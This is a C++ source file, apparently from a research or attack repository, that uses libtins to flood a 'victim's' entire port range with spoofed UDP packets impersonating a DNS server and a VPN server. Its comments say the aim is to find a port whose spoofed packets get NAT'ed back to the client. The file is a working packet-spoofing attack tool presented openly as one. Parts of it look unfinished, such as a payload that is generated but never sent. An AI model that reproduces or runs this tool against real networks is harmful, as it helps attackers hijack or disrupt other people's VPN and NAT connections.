You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 
 
 
 
 
 

165 lines
3.5 KiB

#include <tins/tins.h>
#include <cassert>
#include <iostream>
#include <string>
#include <unistd.h>
#include <thread>
#include <random>
using std::thread;
using std::cout;
using std::string;
using std::vector;
using namespace Tins;
bool is_running = true;
bool verbose = false;
bool count_resp = false;
string dest_ip;
string server_ip;
void print_divider(int count) {
int i = 0;
while (i < count) {
if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
i++;
}
}
std::string random_string(std::size_t length) {
const std::string CHARACTERS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
std::random_device random_device;
std::mt19937 generator(random_device());
std::uniform_int_distribution<> distribution(0, CHARACTERS.size() - 1);
string random_string;
for (std::size_t i = 0; i < length; ++i) {
random_string += CHARACTERS[distribution(generator)];
}
return random_string;
}
// Spreads UDPs across the victim's entire port range
// to find a port that is being used and the spoofed packets
// get NAT'ed back to the client
//
int spread_uds(bool server_spread, string server_ip, int server_port, string dest_ip, int start_port, int end_port) {
PacketSender sender;
NetworkInterface iface("enp0s9");
int i;
IP pkt;
if (server_spread) pkt = IP(dest_ip, server_ip) / UDP(start_port, server_port);
else pkt = IP(server_ip, dest_ip) / UDP(server_port, start_port);
UDP& udp = pkt.rfind_pdu<UDP>();
int spoof_port = start_port;
int send_size = 0;
int send_count = 0;
string send_payload = random_string(send_size);
cout << "spreading the port range from " << spoof_port << " to " << end_port << " with udps..\n";
while (spoof_port < end_port) {
if (server_spread) udp.dport(spoof_port); // set the packets src port to current guess
else udp.sport(spoof_port);
sender.send(pkt, iface);
spoof_port++;
send_size ++;
send_payload = random_string(send_size);
//cout << "next rando string: " << send_payload << "\n";
// if the payload size reaches 1000 (max), reset back to 0
if (send_size >= 1000) {
send_size = 0;
cout << "Sent w size 1000 to " << spoof_port << "\n";
}
usleep(1);
}
if (verbose) print_divider(2);
return 1;
}
int fill_ports(bool server_spread, string source_ip, int sport, string dest_ip, int start_port, int end_port) {
bool filling = true;
int current_port = 0;
while (filling) {
current_port = spread_uds(server_spread, source_ip, sport, dest_ip, start_port, end_port);
print_divider(1);
if (verbose) cout << "finished phase 2 w possible port: " << current_port << "\n";
count_resp = true;
filling = false;
print_divider(2);
}
return current_port;
}
int main(int argc, char** argv) {
cout << "arc twas: " << argc;
if (argc != 6 && argc != 7) {
cout << "sike wrong number of args ---> (server_ip, server_port, dest_ip, start_port, end_port <enable_server_spread>)\n";
return 0;
}
server_ip = argv[1]; // dns server IP
int server_port = atoi(argv[2]);
dest_ip = argv[3]; // vpn server IP
int start_port = atoi(argv[4]);
int end_port = atoi(argv[5]);
bool server_spread = false;
if (argc == 7) server_spread = true;
verbose = true;
string dest_mac = "";
string src_mac = "";
print_divider(2);
int p = fill_ports(server_spread, server_ip, server_port, dest_ip, start_port, end_port);
cout << p << "\n";
print_divider(1);
is_running = false;
if (verbose) cout << "Filled up all those ports and finished at: " << p << "\n";
return p;
}